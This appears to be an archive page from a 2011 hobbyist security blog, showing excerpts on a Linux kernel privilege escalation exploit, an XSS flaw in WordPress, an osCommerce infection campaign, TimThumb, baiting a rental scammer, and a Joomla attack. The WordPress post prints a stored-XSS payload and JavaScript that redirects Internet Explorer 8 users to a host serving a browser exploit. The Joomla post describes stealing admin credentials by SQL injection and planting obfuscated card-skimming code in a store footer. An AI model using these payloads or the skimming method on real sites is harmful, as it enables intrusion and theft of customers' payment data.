
Showing posts from 2011

Ubuntu Server Exploit (Local Privilege Escalation)

Today we're gonna talk about an "old" vulnerability discovered by Dan Rosenberg in the Linux kernel. This bug affects kernel versions before 2.6.38 and permits a user with low privileges to gain root access. Link to exploit: Linux Kernel <= 2.6.37 Local Privilege Escalation

The text below is taken from the exploit description:

    This exploit leverages three vulnerabilities to get root, all of which were
    discovered by Nelson Elhage:

    CVE-2010-4258
    -------------
    This is the interesting one, and the reason I wrote this exploit. If a
    thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
    word will be written to a user-specified pointer when that thread exits.
    This write is done using put_user(), which ensures the provided destination
    resides in valid userspace by invoking access_ok(). However, Nelson
    discovered that when the kernel performs an address limit override via
    set_fs(KERNEL_DS) and the thread subsequen

Have fun with scammers

A couple of days ago I received this e-mail. After reading it I decided to go on and have some fun with him, so I replied, and after one day I got the response. To convince me he attached four pictures of the flat. Here are the living room and my future bedroom. Anyone can see that this picture is from a five-star hotel, but to be really sure I used Google search by image, and what did I find? That these images are from a hotel in the center of Milan. Things are getting interesting, so I decided to find out how I could get this awesome flat. His response. Now it's time to send him my personal information in a PDF. After this e-mail I haven't got any response; maybe he is angry with me, but I don't know why :(.

Wordpress XSS Vulnerability + IE 8 Exploit

On 30 December 2010 a guy named sneak reported a persistent XSS vulnerability that affects the popular blog CMS WordPress <= 3.0.3. The problem is located in the kses.php file, which is the HTML sanitation library. If we type a link with the href attribute written in capital letters, this library doesn't filter the content properly. Example: <a HREF="javascript:alert(0)">CLICK HERE</a> If we post a comment, this tag will be accepted as a common link. With this vulnerability we can craft a piece of code that can steal cookies, redirect to other sites, etc. This video shows you how easy it can be for anyone to craft an evil comment that redirects the victim to a server where there is an exploit for Internet Explorer 8 (CVE-2010-3971). Our evil code: var s = navigator.userAgent; if( s.search('MSIE 8.0') != -1 ) { window.location = "http://192.168.2.13:8080/news"; } Reference and more detailed information: - Sneak

OsCommerce Malware Infection

Three months ago a huge site infection campaign started against osCommerce, a well-known CMS for small and medium-sized online stores. This CMS suffers from a few vulnerabilities that can let an attacker upload files and execute remote code. Vulnerabilities: - osCommerce 2.2 Remote File Upload Vulnerability - osCommerce authentication bypass - osCommerce 2.2 Arbitrary PHP Code Execution - osCommerce 2.3.1 Remote File Upload Vulnerability Today (4/10/2011) the total number of infected sites is 830,000, but two months ago it was 8 million. In some compromised sites the attacker has left the webshell. After uploading a backdoor, the attacker edits the home page and adds a script/iframe tag that loads multiple browser exploits. Exploits used: - IE 6 Remote Code Execution - Java Runtime Environment Remote Code Execution Vulnerability - Microsoft Windows Help - Adobe Reader and Acrobat 8.x After successful exploitation a malware sample is downloaded and executed. V

Wordpress TimThumb Exploit (Remote Code Execution)

A lot of WordPress themes use the TimThumb script to resize images. From version 1.15 to 1.33, TimThumb allows external domains such as flickr.com to display remote images on your website. More detailed information here: - WordPress TimThumb hack - Zero Day vulnerability in many WordPress themes Resources: - TimThumb version used - Vulnerable WordPress theme - List of vulnerable WordPress themes

Joomla Plugin Exploit + PHP Malware

Garden Store has a vulnerable version (1.1.7) of VirtueMart (a Joomla plugin), and through a blind SQL injection we can retrieve the administrator credentials. We edit the main template and place in the footer tag a simple, properly obfuscated piece of code to capture users' credit card data. Reference: - VirtueMart exploit found by TecR0c & mr_me - Joomla hash cracker - PHP obfuscator - dopost source code - getcc source code

Why this blog

Hi People, I've decided to open this blog because I can't always explain everything through a video and its description box. Remember... I'm NOT an expert or a regular blogger, and I make videos only for fun. I also have a Twitter account, @SecObscurity. See you soon. ~SecurityObscurity